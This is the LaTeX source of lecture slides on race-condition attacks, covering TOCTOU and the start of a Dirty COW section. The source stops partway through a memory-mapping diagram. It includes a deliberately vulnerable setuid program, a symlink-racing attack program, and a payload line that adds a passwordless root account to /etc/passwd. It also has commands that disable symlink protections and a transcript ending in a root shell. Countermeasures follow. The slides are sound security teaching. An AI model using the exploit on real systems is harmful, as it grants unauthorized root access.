\input{../common/header.tex}
\input{../common/cmds.tex}

\title{Ch. 6 - Race condition attacks}

\begin{document}
\input{../common/front.tex}

\section{Introduction}

\begin{frame}
\frametitle{Overview}
\begin{exampleblock}<+->{Race condition}
	\begin{itemize}[<+->]
	\item Situation where the output of a program depends on the timing of uncontrollable events
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Originally observed in electronic systems, where the timing of signals is important
	\begin{itemize}
	\item Two signals "race" each others to influence the output
	\end{itemize}
\item Attackers seek to influence "uncontrollable" events to affect the output of the program
\item Linked to concurrency problems
\item Often, an attack consists in running a script in a loop and wait for favorable conditions
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Academic example}
\begin{itemize}
\item File \texttt{race\_cond.py}
\end{itemize}
\begin{lstlisting}[style=python]
def withdraw(amount):
    balance = getBalance() #remote call
    if amount <= balance:
        balance -= amount
        print amount, "$ withdrawn"
        saveBalance() #remote call
    else:
        print "Insufficient funds"
\end{lstlisting}
\begin{itemize}
\item If two withdrawal requests for the same account arrive at the same time, a race condition may happen
	\begin{itemize}
	\item Assume the balance is $100$€ and each request asks for $60$€
	\item The server allows withdrawal from the first request%, and money is withdrawn
	\item The second request asks for th balance, it is still $100$€
	\item The second request is still allowed
	\item $120$€ are withdraw, and the final balance is $40$€
	\end{itemize}
\item Here, this problem can be solved with semaphores
%\item In "real" programs vulnerable to race condition, it is not possible
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Type of race conditions}
\begin{itemize}[<+->]
\item We study here two race conditions
\end{itemize}
\begin{exampleblock}<+->{Time-of-check Time-of-use}
	\begin{itemize}[<+->]
	\item Happens when the checking of a condition happens before using a resource
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Dirty COW}
	\begin{itemize}[<+->]
	\item Found in the linux kernel in 2016
	\item Exploits a vulnerability in memory mapping
	\item Allow attackers to modify any protected file
	\end{itemize}
\end{exampleblock}
\end{frame}

\section[TOCTOU]{Time-of-check to Time-of-use}

\begin{frame}[containsverbatim]
\frametitle{An academic example}
\begin{itemize}
\item Consider the following code sample of a root-owned setuid program
\end{itemize}
\begin{lstlisting}
if(! access("/tmp/xxx", W_OK)) //real user has write permission
{
	int fd = open("/tmp/xxx", O_WRITE);
	write_stuff(fd);
}
else
	fprintf(stderr, "Permission denied\n");
\end{lstlisting}
\begin{enumerate}
\item We want to write to \texttt{/tmp}, a world-writable directory
\item We want to prevent a user to overwrite other users' files
	\begin{itemize}
	\item We use \texttt{access}
	\end{itemize}
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{The problem}
\begin{itemize}[<+->]
\item Both the \texttt{open} and \texttt{access} system calls check user's permissions
	\begin{itemize}
	\item \texttt{access} checks the \emph{real} user id
	\item \texttt{open} checks the \emph{effective} user id		
	\end{itemize}
\item Consequently, the check performed by \texttt{open} always succeeds in setuid programs
	\begin{itemize}
	\item ... which is why we use \texttt{access}
	\end{itemize}
\item However, there is a window between these two checks
\end{itemize}
\begin{exampleblock}<+->{Questions}
	\begin{itemize}[<+->]
	\item What if \texttt{/tmp/xxx} change between the checks ?
	\item How malicious can that change be ?
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{The attack plan}
\begin{enumerate}[<+->]
\item Create a regular file named \texttt{xxx} into \texttt{/tmp}
	\begin{itemize}
	\item Since it is our file, we will pass the \texttt{access} check
	\end{itemize}
\item Before the \texttt{open} check, change \texttt{/tmp/xxx} to a symbolic link pointing to \texttt{/etc/passwd}
	\begin{itemize}
	\item We didn't change the name of the file, just its meaning
	\end{itemize}
\item When \texttt{open} is called, it will actually open \texttt{/etc/passwd}
	\begin{itemize}
	\item Since \texttt{open} only checks the effective user id (root), we will be able to open the password file and write into it
	\end{itemize}
\end{enumerate}
\begin{alertblock}<+->{Problem}
	\begin{itemize}
	\item The window of attack is very short
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Many race condition attacks involve symbolic links
	\begin{itemize}
	\item Existing dedicated OS-provided protection
	\item Do not follow symbolic links from world writable directories
%	\item We deactivate the protection : \texttt{sudo sysctl -w kernel.yama.protected\_sticky\_symlinks=0}
	\end{itemize}
\end{itemize}
\end{frame}

\definecolor{Green}{rgb}{0.0, 0.65, 0.31}

\begin{frame}
\frametitle{Illustration}
\begin{center}
\begin{tikzpicture}[scale=.6]
\onslide<1->{\fill[color=blue!60] (0,11) rectangle (8,12);}
\onslide<1->{\fill[color=red!60] (12,11) rectangle (20,12);}
\onslide<1->{\draw (0,2) rectangle (8,12);}
\onslide<1->{\draw (12,2) rectangle (20,12);}
\onslide<1->{\node at (4,11.5) {\textbf{\tiny Privileged program}};}
\onslide<1->{\node at (16,11.5) {\textbf{\tiny Attacker program}};}

\onslide<3->{\node[_blackv, label={right:\tiny\texttt{access()}}] (access) at (5.5,9) {};}
\onslide<9->{\node[_blackv, label={right:\tiny\texttt{open()}}] (open) at (5.5,4) {};}

\onslide<2->{\draw[_arc, very thick] (5.5,10.5) -- (access) node[left, midway, text width=2.5cm] {\tiny\texttt{/tmp/X} points to an attacker owned file};}

\coordinate (a1) at (5.5,8);
\coordinate (a2) at (14,8);
\coordinate (a3) at (14,5);
\coordinate (a4) at (5.5,5);


\onslide<4->{\draw[_arc, very thick] (access) -- (a1);}
\onslide<5->{\draw[_arc, red!60, very thick] (a1) -- (a2) node[above, midway] {\tiny\textsc{Context switch}};}
\onslide<6->{\draw[_arc, red!60, very thick] (a2) -- (a3) node[right, midway, text width=3cm] {\tiny Make \texttt{/tmp/X} point to \texttt{/etc/passwd}};}
\onslide<7->{\draw[_arc, red!60, very thick] (a3) -- (a4);}
\onslide<8->{\draw[_arc, very thick] (a4) -- (open);}

\onslide<10->{\draw[_arc, very thick] (open) -- (5.5,2.5) node[left, midway] {\tiny Write to \texttt{/etc/passwd}};}

\onslide<11->{\draw [Green,very thick, decorate,decoration={brace,mirror,amplitude=10pt},xshift=-10pt,yshift=0pt] (5.5,9) -- (5.5,4) node [black,left,midway,xshift=-0.5cm,Green] {\tiny \textsc{Toctou} window};}
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Winning the race condition}
\begin{itemize}[<+->]
\item We use two processes
	\begin{enumerate}
	\item Vulnerable program in a loop
		\begin{itemize}
		\item $V_1$ : Real user id check with \texttt{access}
		\item $V_2$ : \texttt{open}
		\end{itemize}
	\item Attack program in a loop
		\begin{itemize}
		\item $A_1$ : Make \texttt{/tmp/xxx} point to a file we own
		\item $A_2$ : Make \texttt{/tmp/xxx} point to \texttt{/etc/passwd}
		\end{itemize}
	\end{enumerate}
\item Execution sequences :
	\begin{itemize}
	\item Vulnerable program : $V_1V_2V_1V_2\dots$
	\item Attack program : $A_1A_2A_1A_2\dots$
	\end{itemize}
\item The actual (simultaneous or alternated) sequence of execution is a combination of these two
\item If, at any time, $A_1V_1A_2V_2$ occurs, the vulnerable program opens \texttt{/etc/passwd}
	\begin{itemize}
	\item We "win the race condition"
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Other example}
\begin{lstlisting}
const char* file = "/tmp/XXX";
bool fileExist = check_file_existence(file);

if(! fileExist)
{
	int fd = open(file, O_CREAT);
	
	//do stuff
}
\end{lstlisting}
\begin{itemize}
\item We want to create a file if it doesn't already exist
\item There is a window between the check and the use (\texttt{open})
\end{itemize}
\begin{exampleblock}{Question}
	\begin{itemize}
	\item Is there an undesirable race condtion problem?
	\item Can we change the progam output by doing something within the window
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Sneaky backstabbing}
\begin{alertblock}<+->{The side-effect of \texttt{O\_CREAT}}
	\begin{itemize}[<+->]
	\item If the file already exists, the system call \emph{will not} fail
	\item It will simply open the file for writing
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Inside the window, we can make the name point to an existing file of our choice
	\begin{itemize}
	\item Such as \texttt{/etc/passwd}
	\end{itemize}
\item Like this, we will get the privileged program to open that file, and write to it
\item The output of the program will be changed
	\begin{itemize}
	\item We now write to a protected file
	\end{itemize}
\item This is a race condition problem
\end{itemize}
\end{frame}

\subsection{Deployment}

\begin{frame}[containsverbatim]
\frametitle{Vulnerable program}
\begin{itemize}
\item File \texttt{TOCTOU-vuln.c}
\end{itemize}
\begin{lstlisting}
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main()
{    
    char buffer[60];    
    printf("What do you want to write?\n");
    scanf("%50s", buffer);
    
    char * filename = "/tmp/XYZ";
    if(! access(filename, W_OK))
    {
        FILE * file = fopen(filename, "a+");
        
        fwrite("\n", sizeof(char), 1, file);
        fwrite(buffer, sizeof(char), strlen(buffer), file);
        fclose(file);
    }
    else
        printf("Access denied\n");
}
\end{lstlisting}
\begin{itemize}
\item Setuid root-owned program
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Why it is vulnerable}
\begin{itemize}[<+->]
\item There is a TOCTOU window between \texttt{access} and \texttt{fopen}
	\begin{itemize}
	\item Similar to previous examples
	\end{itemize}
\item Once exploited, the program writes to a protected file
	\begin{itemize}
	\item \texttt{/tmp/XYZ} is not protected, but we will turn it into a symbolic link to a protected file
	\end{itemize}
\item Moreover, the content written is user-provided (by \texttt{scanf})
\end{itemize}
\begin{alertblock}<+->{The real problem}
	\begin{itemize}[<+->]
	\item Attackers are allowed to write arbitrary contents into an arbitrary file of their choice
	\end{itemize}
\end{alertblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Making it worse}
\begin{itemize}
\item File \texttt{TOCTOU-vuln2.c}
\end{itemize}
\begin{lstlisting}
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main()
{                   
    char * filename = "/tmp/XYZ";
    if(! access(filename, W_OK))
    {
        char buffer[60]; 
        printf("What do you want to write?\n");
        scanf("%50s", buffer);
        
        FILE * file = fopen(filename, "a+");
        
        fwrite("\n", sizeof(char), 1, file);
        fwrite(buffer, sizeof(char), strlen(buffer), file);
        fclose(file);
    }
    else
        printf("Access denied\n");
}
\end{lstlisting}
\begin{itemize}
\item The TOCTOU window is much larger
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The structure of \texttt{/etc/passwd}}
\begin{itemize}[<+->]
\item Text file where each user has an entry
	\begin{itemize}
	\item A line
	\end{itemize}
\item Each entry consists of seven fields separated by \texttt{:}
\end{itemize}
\visible<+->
{
	\centering
	\includegraphics[width=.8\textwidth]{pics/passwd.pdf}
}
\begin{itemize}[<+->]
\item If the password hash is \texttt{x}, it means it is stored elsewhere
	\begin{itemize}
	\item In \texttt{/etc/shadow}
	\end{itemize}
\item On Ubuntu, there is a "magic" value for password-less accounts
	\begin{itemize}
	\item \texttt{U6aMy0wojraho}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Workarounds}
\begin{itemize}[<+->]
\item We can use several approaches
	\begin{enumerate}[<+->]
	\item We can copy the entry of a user whose password is known
		\begin{itemize}
		\item Both in \texttt{/etc/passwd} and \texttt{/etc/shadow}
		\end{itemize}
	\item We can set \texttt{x} to be the hash value of a known password
		\begin{itemize}
		\item Use \texttt{adduser} and retrieve the hash value from the shadow file
		\end{itemize}
	\item Same as above, but we modify both \texttt{/etc/passwd} and \texttt{/etc/shadow}
	\item On Ubuntu, use the magic value
	\end{enumerate}
\item We will use the last one
	\begin{itemize}
	\item For academic reasons (aka: simplicity)
	\end{itemize}
\item Add {\scriptsize\texttt{sneak:U6aMy0wojraho:0:0:M. Backstab:/root:/bin/bash}} \linebreak to \texttt{/etc/passwd}
	\begin{itemize}
	\item \texttt{0} is zero, neither the capital letter \texttt{O} not the lowercase letter \texttt{o}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Launching the attack}
\begin{itemize}[<+->]
\item We need to create two processes that "race" against each others
	\begin{itemize}
	\item The target process and the attack process
	\end{itemize}
\item The target process runs the privileged vulnerable program
	\begin{itemize}
	\item In a loop: unlikely single-try win
	\item We only need to win once to compromise the system
	\end{itemize}
\item The attack process will repeatedly change \texttt{/tmp/XYZ} to a symbolic link to \texttt{/etc/passwd}
	\begin{itemize}
	\item Use \texttt{unlink} then \texttt{symlink} to make \texttt{/tmp/XYZ} point to one of our own files
		\begin{itemize}
		\item So we can pass \texttt{access}
		\end{itemize}
	\item Sleep for some time to give the target process an opportunity to run
	\item Use \texttt{unlink} then \texttt{symlink} to make \texttt{/tmp/XYZ} point to \texttt{/etc/passwd}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Target process}
\begin{itemize}
\item File \texttt{basic-target.sh}
\end{itemize}
\begin{lstlisting}[style=bash]
while :
    do
        ./TOCTOU-vuln < passinput.txt
    done
\end{lstlisting}
\begin{itemize}
\item File \texttt{passinput.txt}
\end{itemize}
\begin{lstlisting}
sneak:U6aMy0wojraho:0:0:M. Backstab:/root:/bin/bash
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Attack process}
\begin{itemize}
\item File \texttt{attack.c}
\end{itemize}
\begin{lstlisting}
#include <unistd.h>
#include <stdbool.h>

int main()
{
    while(true)
    {
        //pass access()
        unlink("/tmp/XYZ");
        symlink("/home/serra/brol.txt", "/tmp/XYZ");
        usleep(10000);
        
        //exploit TOCTOU window
        unlink("/tmp/XYZ");
        symlink("/etc/passwd","/tmp/XYZ");
        usleep(10000);
    }
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Monitoring the result}
\begin{itemize}[<+->]
\item We want to know whether our attack is successful
	\begin{itemize}
	\item And when
	\end{itemize}
\item Since the target process runs in a loop, we want to do stop it when the attack succeeds
\item We could check the timestamp of the password file
	\begin{itemize}
	\item To check whether it has been changed or not	
	\end{itemize}	
\item We want to to that automatically
	\begin{itemize}
	\item Because it can take a while before it happens
	\end{itemize}
\item We will monitor changes in the output of \texttt{ls -l}
	\begin{itemize}
	\item Outputs information about a file
	\item Including last modified time
	\item Comparing outputs will tell whether the file has been changed or not
	\end{itemize}	
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\begin{itemize}
\item File \texttt{target.sh}
\end{itemize}
\begin{lstlisting}[style=bash]
CHECKER = "ls -l /etc/passwd"
old=$($CHECKER)
new=$($CHECKER)

while ["$old" == "$new"]
    do
        ./TOCTOU-vuln < passinput.txt
        new=$($CHECKER)
    done
echo "Attack successful: password file has been changed"
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Running the exploit}
\begin{enumerate}
\item We make the vulnerable program setuid
\item We deactivate some TOCTOU protections with \texttt{sysctl}
\item We launch the attack
\end{enumerate}
\begin{lstlisting}[style=bash]
$ sudo chown root TOCTOU-vuln
$ sudo chmod 4755 TOCTOU-vuln
$ sudo sysctl -w fs.protected\_symlinks=0
$ ./attack &
$ ./target
Access denied
Access denied
...
Access denied
Attack successful: password file has been changed
$ cat /etc/passwd
 ...
serra:x:1000:1000:Romain Absil,,,:/home/serra:/bin/bash
 ...
sneak:U6aMy0wojraho:0:0:M. Backstab:/root:/bin/bash
$ su sneak
Password:
#
# id
uid=0(root) gid=1000(ssd) groups=0(root), ...
\end{lstlisting}
\end{frame}

\subsection{Countermeasures}

\begin{frame}
\frametitle{Different protection schemes}
\begin{itemize}[<+->]
\item Several approaches can be used
\end{itemize}
\begin{exampleblock}<+->{Questions}
	\begin{itemize}[<+->]
	\item How to we eliminate the TOCTOU window?
	\item How de we prevent attackers from doing anything inside the TOCTOU window?
	\item How do we prevent attackers from winning the race?
	\item How do we prevent attackers from doing harm after they have won the race?
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item We will discuss countermeasures solving these problems
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{First solution: atomic operation}
\begin{itemize}[<+->]
\item A TOCTOU race condition exists due to a window between the check and the use operations
\item During this period, other processes have opportunities to negate the outcome of the check
\end{itemize}
\begin{exampleblock}<+->{Solution}
	\begin{itemize}[<+->]
	\item Make the check and use operations atomic
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Completely eliminates the window
\end{itemize}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item Requires support from the operating system
	\end{itemize}
\end{alertblock}
\end{frame}

\begin{frame}
\frametitle{The case of \texttt{open}}
\begin{itemize}[<+->]
\item The \texttt{open} system call provides an option called \lstinline|O_EXCL|
\item Combined with \lstinline|O_CREAT|, it will not open the specified file if it already exists
\item The implementation of \texttt{open} guarantees the atomicity of the check (file existence) and of the use (opening)
\item Moreover, when these two flags are specified, symbolic links are not followed
	\begin{itemize}
	\item If the file name is a symbolic link, \texttt{open} will always fail
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Solution}
	\begin{itemize}[<+->]
	\item Replace the regular \lstinline|int fd = open(file, O_CREAT);| with \lstinline|int fd = |\texttt{ open(file, O\_CREAT | O\_EXCL);}
	\item The line with \lstinline|check_file_existence(file);| can be removed
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{The case of \texttt{access}}
\begin{itemize}[<+->]
\item There is no way in the current Linux kernel to make \texttt{access} check and file open atomically
\item However, inside \texttt{open}, there is a check before the opening, and this check-and-use is atomic
	\begin{itemize}
	\item Otherwise, \texttt{open} has a race condition problem
	\end{itemize}
\item The difference is what user id is used
	\begin{itemize}
	\item \texttt{open} checks the effective user id
	\item \texttt{access} checks the real user id
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Possible workaround}
	\begin{itemize}[<+->]
	\item Provide \texttt{open} with the real user id
		\begin{itemize}
		\item Moves the \texttt{access} check inside \texttt{open}, making it atomic
		\end{itemize}
	\item \lstinline|int fd = |\texttt{ open(file, O\_WRITE | O\_REAL\_USER\_ID);}
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Unfortunately, such an option does not exist (yet)
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Second solution: repeated checks and uses}
\begin{itemize}[<+->]
\item The race condition vulnerability relies on the attackers ability to win the race during the TOCTOU window
\end{itemize}
\begin{exampleblock}<+->{Solution}
	\begin{itemize}
	\item Make the race harder to win
	\item Add more race conditions
		\begin{itemize}
		\item Attackers need to win them all to succeed
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Instead of using \texttt{access} or \texttt{open} once, use them several times instead
\item After that, we check it the opened files are the same
	\begin{itemize}
	\item We can check if their inodes are the same
	\end{itemize}
\item If they are the same, there is most likely no attack
	\begin{itemize}
	\item The attacker needs to change \texttt{"/tmp/XYZ"} in every window
	\item Otherwise, either \texttt{access} will fail or a different file will be opened
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example: repeated checks}
\begin{itemize}
\item We make several redundant \texttt{access checks}
\item File descriptors are stored in a provided array
\item File \texttt{repeat-prot.c}
\end{itemize}
\begin{lstlisting}
bool repeat_check(unsigned n, int fd[])
{
    for(unsigned i = 0; i < n ; i++)
    {
        if(access("/tmp/XYZ", O_RDWR))
            return false;
        else
            fd[i] = open("/tmp/XYZ", O_RDWR);
    }
    return true;
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example: checking for race condition}
\begin{itemize}
\item We compare inodes 
	\begin{itemize}
	\item We check if the opened files are the same	
	\end{itemize}
\item File \texttt{repeat-prot.c}
\end{itemize}
\begin{lstlisting}
bool race_check(unsigned n, const int const fd[])
{
    struct stat stats[n];
    for(unsigned i = 0; i < n; i++)
        fstat(fd[i], &(stats[i]));
    
    bool race = false;
    for(unsigned i = 1; i < n && !race; i++)        
        race = stats[0].st_ino != stats[i].st_ino;
    
    return race;
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example: usage}
\begin{itemize}
\item We check that
	\begin{itemize}
	\item all the \texttt{access} checks succeeded
	\item there is no race condition
		\begin{itemize}
		\item All the opened files are the same
		\end{itemize}
	\end{itemize}	
\item File \texttt{repeat-prot.c}
\end{itemize}
\begin{lstlisting}
int main()
{
    unsigned n_checks = 3;
    
    int fd[n_checks];
    if(! repeat_check(n_checks, fd))
    {
        fprintf(stderr, "Permission denied\n");
        return 1;
    }        
    
    if(race_check(n_checks, fd))
        fprintf(stderr, "Race condition detected\n");
    else
        write_to_file(fd[0]);
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Third solution: sticky symlinks}
\begin{itemize}[<+->]
\item Most TOCTOU race condition vulnerabilities involve following symbolic links
	\begin{itemize}
	\item Usually, inside \texttt{/tmp}
	\end{itemize}
\item Linux comes with a built-in protection that prevents programs from following symbolic links under certain conditions
	\begin{itemize}
	\item Inside world-writable directories
	\end{itemize}
\item Directories have a special bit: the sticky bit
	\begin{itemize}
	\item If set, files inside can only be renamed/deleted by the file's or directory owner, or root
	\item \texttt{/tmp} is world-writable, so the sticky bit is set to prevent normal users from renaming or deleting other users' files
	\end{itemize}
\item When the sticky symlink protection is enabled, symbolic links inside sticky directories can only be followed if the owner of the symlink matches either follower or the directory owner
\item While attackers can still win race conditions, they can do no damage
	\begin{itemize}
	\item The program crashes
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Sticky symlink protection}
\begin{center}
\begin{tabular}{|c|c|c|c|}
\hline
Follower & Dir. Owner & Symlink owner & \texttt{fopen} \\
\hline
serra & serra & serra & \textcolor{Green}{Granted} \\
serra & serra & root  & \textcolor{red}{Denied} \\
serra & root  & serra & \textcolor{Green}{Granted} \\
serra & root  & root  & \textcolor{Green}{Granted} \\
root  & serra & serra & \textcolor{Green}{Granted} \\
root  & serra & root  & \textcolor{Green}{Granted} \\
root  & root  & serra & \textcolor{red}{Denied} \\
root  & root  & root  & \textcolor{Green}{Granted} \\
\hline
\end{tabular}
\end{center}
\begin{itemize}
\item Can be turned off with
\end{itemize}
\begin{lstlisting}[style=bash]
$ sudo sysctl -w fs.protected_symlinks=0
\end{lstlisting}
\begin{itemize}
\item Depending on your distribution, it can be another command, \eg
\end{itemize}
\begin{lstlisting}[style=bash]
$ sudo sysctl -w kernel.yama_protected_symlinks=0
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Fourth solution: principle of least privilege}
\begin{itemize}[<+->]
\item To prevent from writing to protected files, a program created a TOCTOU window that we needed to fix
	\begin{itemize}
	\item It doesn't look right
	\end{itemize}
\item In previous examples, a privileged program needed to write to a file that didn't require any privilege
	\begin{itemize}
	\item The program has more privilege than it actually needs
	\item It doesn't have (or need) root privileges when calling \texttt{open} or \texttt{access}
	\end{itemize}
\end{itemize}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item Clear violation of the principle of least privilege
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item We should (at least temporarily) downgrade privileges at this point
	\begin{itemize}
	\item With \texttt{seteuid} or \texttt{setuid}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Code sample}
\begin{lstlisting}
int real_uid = getuid();
int eff_uid  = geteuid();

seteuid(real_uid); //disables root privileges

int fd = open("/tmp/XYZ", O_WRITE);
if(fd != -1)
	write_to_file(fd); //do unprivileged stuff
else
	fprintf(stderr, "Access denied\n");
	
seteuid(eff_uid); //If needed, restore root privileges
\end{lstlisting}
\end{frame}

\section{Dirty COW}

\begin{frame}
\frametitle{Introduction}
\begin{itemize}[<+->]
\item A particular case of race condition vulnerability
\item Happens when writing to mapped memory
	\begin{itemize}
	\item Used to increase performance, share data between processes, etc.
	\end{itemize}
\item Can give attackers root privileges on a device
	\begin{itemize}
	\item Goal: modify \texttt{/etc/passwd}
	\end{itemize}
\item Existed in the linux kernel since September 2007 and was exploited in October 2016
\end{itemize}
\end{frame}

\subsection{Memory mapping}

\begin{frame}
\frametitle{Memory mapping with \texttt{mmap}}
\begin{itemize}[<+->]
\item To understand the Dirty COW vulnerability, it is necessary to understand memory mapping
\item In Unix, \texttt{mmap} is a posix system call that maps files or devices into memory
\item Creates a new mapping in the virtual address space of the calling process
	\begin{itemize}
	\item If used on a file, its content\footnote{Or part of it} is loaded into physical memory
	\item It is then mapped to the calling process' virtual memory, through the paging mechanism
	\end{itemize}
\item When multiple processes map the same file into memory
	\begin{itemize}
	\item the file is mapped to different virtual memory addresses
	\item ... but the actual, physical, memory where it is held is the same
	\end{itemize}
\item Possibility to \emph{share} the mapping between processes, or to have a \emph{private} copy
\end{itemize}

\end{frame}

\begin{frame}
\frametitle{Applications}
\begin{itemize}[<+->]
\item Inter-Process Call (IPC), allowing a process to send data to another process
	\begin{itemize}
	\item If two processes want to communicate with each others, they can map the same file into their own memory
	\item If a process writes to the mapped memory, the effects are immediately visible to the other process\footnote{With \texttt{MAP\_SHARED}}
	\end{itemize}
\item Increase performance while writing/reading
	\begin{itemize}
	\item \texttt{read} and \texttt{write} system calls involve copying data between user space and kernel space
	\item With \texttt{mmap}, reading/writing are memory operations, performed in user space
	\end{itemize}
\item Drawback: you have to commit a block of memory (at least one page) to the mapped resource
	\begin{itemize}
	\item It can become costly
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item File \texttt{mmap\_ex.c}
\end{itemize}
\begin{lstlisting}
int fd = open("./zzz", O_RDWR);    
struct stat st;
fstat(fd, &st);
    
void* map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    
char buffer[20];
memcpy((void*)buffer, map, 10); //reads 10 bytes from the mapped memory
    
const char* stuff = "Hello there";
memcpy(map + 5, stuff, strlen(stuff)); //writes through the mapped memory
    
munmap(map, st.st_size); //discards mapped memory
close(fd);
\end{lstlisting}
\begin{itemize}
\item Line 5: Call \texttt{mmap} to create a mapped memory	
\item Line 8: Reads 10 bytes from the mapped memory (\ie the file)
\item Line 11: Writes a string into the mapped memory
	\begin{itemize}
	\item The file is modified
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{\texttt{mmap} arguments}
\begin{enumerate}[<+->]
\item Starting address 
	\begin{itemize}
	\item If \lstinline|NULL|, the kernel chooses
	\end{itemize}
\item Size of the mapped memory
\item Read/write options (should match the access type of the file descriptor)
	\begin{itemize}
	\item Since the file is opened with the \texttt{O\_RDWR} flag, we should use \texttt{PROT\_READ} and \texttt{PROT\_WRITE}
%	\item Mismatches create segmentation faults
	\end{itemize}
\item Specified whether an update is visible to other processes mapping the same area, and whether updates are carried through the underlying file
	\begin{itemize}
	\item \texttt{MAP\_SHARED} and \texttt{MAP\_PRIVATE} are the most common types
%	\item We discuss their use afterwards
	\end{itemize}
\item File descriptor to map from
	\begin{itemize}
	\item We can choose a previously opened file, or a device
	\end{itemize}
\item Offset
	\begin{itemize}
	\item Since we use 0 as offset and use the size of the file as second argument, the entire file is mapped
	\end{itemize}	
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{The \texttt{MAP\_SHARED} option}
\begin{itemize}[<+->]
\item Consider several processes map the same file using \texttt{MAP\_SHARED}
\item They map the file to different \emph{virtual} memory addresses
\item The physical memory, where the file content is held, is \emph{the same}
\item With this option, writing to the mapped memory (from the virtual addresses)
	\begin{itemize}
	\item updates the shared physical memory
	\item updates the file
	\end{itemize}
\item Any modification is immediately visible to other processes
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration: \texttt{MAP\_SHARED} when writing}
\begin{center}
\scalebox{.65}{
\begin{tikzpicture}
%proc 1
\onslide<1->{\node[text width=2.5cm, align=flush center] at (-4.75,4.5) {Process 1's virtual memory};}
\onslide<4->{\filldraw[lightgray] (-6,3.5) rectangle (-3.5,2);}
\visible<6->{\filldraw[blue!60] (-5.75,2.55) rectangle (-3.75,2.25);}
\visible<6->{\node at (-4.75,2.4) {\footnotesize \texttt{memcpy}};}
\onslide<1->{\draw (-6,-1.5) -- (-6,4);}
\onslide<1->{\draw (-3.5,-1.5) -- (-3.5,4);}

%phys mem
\onslide<1->{\node at (2.75,4.5) {Physical memory};}

\onslide<4->{\filldraw[lightgray] (1.5,2.5) rectangle (4,1);}
\visible<6->{\filldraw[blue!60] (1.75,1.55) rectangle (3.75,1.25);}
\visible<6->{\node at (2.75,1.4) {\footnotesize \texttt{memcpy}};}

%\filldraw[lightgray] (1.5,0.5) rectangle (4,-1);
%\filldraw[blue!60] (1.75,-0.45) rectangle (3.75,-0.75);
%\node at (2.75,-0.6) {\footnotesize Overwritten};

\onslide<1->{\draw (1.5,-1.5) -- (1.5,4);}
\onslide<1->{\draw (4,-1.5) -- (4,4);}

%file
\onslide<2->{\draw (-0.5,-1) -- (-0.5,1) -- (0.25, 1) -- (0.5,0.75) -- (0.5,-1) -- (-0.5,-1);}
\onslide<2->{\foreach \i in {1, ..., 8}
	\draw (-0.4,\i*0.2-1) -- (0.4, \i*0.2-1);}
\onslide<2->{\draw (-0.4,0.8) -- (0.3, 0.8);}
\onslide<2->{\node at (0,-1.25) {File};}
\visible<6->{\filldraw[blue!60] (-0.4,-0.3) rectangle (0.4,-0.5);}

%proc 2
\onslide<1->{\node[text width=2.5cm, align=flush center] at (10.25,4.5) {Process 2's virtual memory};}
\onslide<5->{\filldraw[lightgray] (9,1.5) rectangle (11.5,0);}
\visible<6->{\filldraw[blue!60] (9.25,0.55) rectangle (11.25,0.25);}
\visible<6->{\node at (10.25,0.4) {\footnotesize \texttt{memcpy}};}
\onslide<1->{\draw (9,-1.5) -- (9,4);}
\onslide<1->{\draw (11.5,-1.5) -- (11.5,4);}

%arrows
\onslide<4->{\draw[_arc, line width=1pt] (-3.5,2.75) -- (-1,2.75) -- (-1,1.95) -- (1.5,1.95);}
